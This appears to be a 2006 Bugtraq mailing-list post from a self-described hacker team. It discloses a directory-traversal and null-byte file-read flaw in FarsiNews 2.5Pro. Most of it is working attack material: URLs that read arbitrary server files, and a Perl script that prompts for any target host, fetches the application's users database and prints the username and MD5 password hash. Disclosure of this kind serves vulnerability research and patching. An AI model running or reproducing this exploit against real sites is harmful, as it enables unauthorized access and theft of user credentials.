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FarsiNews 2.5Pro Exploit
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: FarsiNews 2.5Pro Exploit
- From: hessamx@xxxxxxxxxxx
- Date: 28 Feb 2006 13:16:24 -0000
# << HESSAM-X >>
# FarsiNews 2.5Pro Exploi
# Exploit by Hessam-x (www.hessamx.net)
#Iran Hackerz Security Team
#WebSite: www.hackerz.ir
# Summery
# Name : FarsiNews [www.farsinewsteam.com]
# version : 2.5Pro
# in FarsiNews if you change the archive value :
# http://localhost/index.php?archive=hamid
# see :
# Warning: file([PATH]/data/archives/hamid.news.arch.php):
# failed to open stream: No such file or directory in [PATH]\inc\shows.inc.php
on line 642
# Warning: file([PATH]/data/archives/hamid.comments.arch.php):
# failed to open stream: No such file or directory in [PATH]\inc\shows.inc.php
on line 686
# ...[and many other error]
# it means that shows.inc.php try to open '/archives/hamid.news.arch.php'
(and also 'hamid.comments.arch.php') to read it's data .
# we can change the archive value to '/../users.db.php%00' to see all username
and password .
# Exploit :
# http://localhost/index.php?archive=/../users.db.php%00
# http://localhost/Farsi1/index.php?archive=/../[file-to-read]%00
# F0und by hamid
use LWP::Simple;
print "-------------------------------------------\n";
print "= Farsinews 2.5Pro =\n";
print "= By Hessam-x - www.hackerz.ir =\n";
print "-------------------------------------------\n\n";
print "Target(www.example.com)\> ";
chomp($targ = <STDIN>);
print "Path: (/fn25/)\>";
$url = "index.php?archive=/../users.db.php%00";
$page = get("http://".$targ.$path.$url) || die "[-] Unable to retrieve: $!";
print "[+] Connected to: $targ\n";
$page =~ m/<img alt="(.*?)" src=/ && print "[+] Username: $1\n";
$page =~ m/style="border: none;" align="right" \/>(.*?)<\/font>/ && print "[+]
MD5 Password: $1\n";
print "[-] Unable to retrieve User ID\n" if(!$1);